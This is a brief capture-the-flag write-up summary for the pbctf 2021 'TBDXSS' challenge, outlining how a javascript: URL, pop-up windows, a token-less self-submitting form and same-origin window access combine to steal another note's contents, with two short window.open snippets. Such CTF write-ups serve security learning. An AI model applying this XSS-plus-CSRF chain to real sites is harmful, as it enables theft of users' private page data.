Tags: csrf xss
Rating:
tl;dr:
* The report url feature allows javascript: urls
* Chrome pop-up blocker doesn't seem to apply here, so you can launch multiple windows
* Open the original note in a named pop up window: `window.open( 'https://tbdxss.chal.perfect.blue/note', 'first' )`
* Launch a second window that goes to a self-submitting form to change the note to our malicious js [No CSRF token is present in challenge]
* Open another window pointing to the note page to run our malicious js
* Since the two windows are in the same origin, you can read the original window's contents from the new notes page via `window.open('', 'first').document.body.innerHTML`
[See full write up for more details](https://bawolff.blogspot.com/2021/10/write-up-pbctf-2021-tbdxss.html).
